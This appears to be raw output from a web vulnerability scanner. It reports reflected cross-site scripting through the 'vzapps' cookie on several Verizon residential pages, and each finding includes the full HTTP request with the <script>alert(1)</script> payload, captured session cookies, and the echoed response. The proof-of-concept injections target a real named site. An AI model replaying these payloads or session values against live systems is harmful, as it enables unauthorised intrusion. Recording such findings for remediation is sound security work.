This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/EntertainmentOnDemand/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXecc81'><script>alert(1)</script>633e3a55ed6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 50751 Expires: Sat, 20 Nov 2010 00:16:06 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:06 GMT Connection: close Set-Cookie: ContextInfo_State=TXecc81'><script>alert(1)</script>633e3a55ed6; path=/ Set-Cookie: FLOWTYPE=VASIP; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Entertainment on Demand </title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies ...[SNIP]... <input type='hidden' id='locationInfo' value='TXECC81'><SCRIPT>ALERT(1)</SCRIPT>633E3A55ED6 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 676cd'><script>alert(1)</script>a3a252376e7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX676cd'><script>alert(1)</script>a3a252376e7; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 75296 Expires: Sat, 20 Nov 2010 00:16:22 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:22 GMT Connection: close Set-Cookie: ContextInfo_State=TX676cd'><script>alert(1)</script>a3a252376e7; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Entertainment on Demand: Games </title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game ...[SNIP]... <input type='hidden' id='locationInfo' value='TX676CD'><SCRIPT>ALERT(1)</SCRIPT>A3A252376E7 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46bbc'><script>alert(1)</script>e3e3a635f7b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX46bbc'><script>alert(1)</script>e3e3a635f7b; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70797 Expires: Sat, 20 Nov 2010 00:16:16 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:16 GMT Connection: close Set-Cookie: ContextInfo_State=TX46bbc'><script>alert(1)</script>e3e3a635f7b; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Entertainment on Demand: Movies </title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi ...[SNIP]... <input type='hidden' id='locationInfo' value='TX46BBC'><SCRIPT>ALERT(1)</SCRIPT>E3E3A635F7B ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fc928<script>alert(1)</script>80e25040c4e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXfc928<script>alert(1)</script>80e25040c4e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56c4c'><script>alert(1)</script>277bd852140 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX56c4c'><script>alert(1)</script>277bd852140; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8b99'><script>alert(1)</script>47fb54bb178 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb8b99'><script>alert(1)</script>47fb54bb178; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab07d<script>alert(1)</script>4c69398d6d5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXab07d<script>alert(1)</script>4c69398d6d5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f710f'><script>alert(1)</script>e2fd98d03b8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXf710f'><script>alert(1)</script>e2fd98d03b8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 57182 Expires: Sat, 20 Nov 2010 00:09:46 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:46 GMT Connection: close Set-Cookie: ContextInfo_State=TXf710f'><script>alert(1)</script>e2fd98d03b8; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 72540<script>alert(1)</script>7d82b6fd3cc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX72540<script>alert(1)</script>7d82b6fd3cc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 217f0'><script>alert(1)</script>c757f2d9905 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX217f0'><script>alert(1)</script>c757f2d9905; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8f35d<script>alert(1)</script>666a41a49d0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8f35d<script>alert(1)</script>666a41a49d0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 114983 Expires: Sat, 20 Nov 2010 00:10:57 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:57 GMT Connection: close Set-Cookie: ContextInfo_State=TX8f35d<script>alert(1)</script>666a41a49d0; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77bd6'><script>alert(1)</script>866fecce315 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX77bd6'><script>alert(1)</script>866fecce315; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 113390 Expires: Sat, 20 Nov 2010 00:09:44 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:44 GMT Connection: close Set-Cookie: ContextInfo_State=TX77bd6'><script>alert(1)</script>866fecce315; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78bda'><script>alert(1)</script>c540e06163e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX78bda'><script>alert(1)</script>c540e06163e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head">
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6e62f<script>alert(1)</script>a74e7065845 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6e62f<script>alert(1)</script>a74e7065845; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head">
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e17ad'><script>alert(1)</script>33b4d098683 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe17ad'><script>alert(1)</script>33b4d098683; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload af6d8<script>alert(1)</script>b1212cf33ee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXaf6d8<script>alert(1)</script>b1212cf33ee; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 46d05<script>alert(1)</script>d1f2b7396b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX46d05<script>alert(1)</script>d1f2b7396b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1de'><script>alert(1)</script>c5602c17654 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
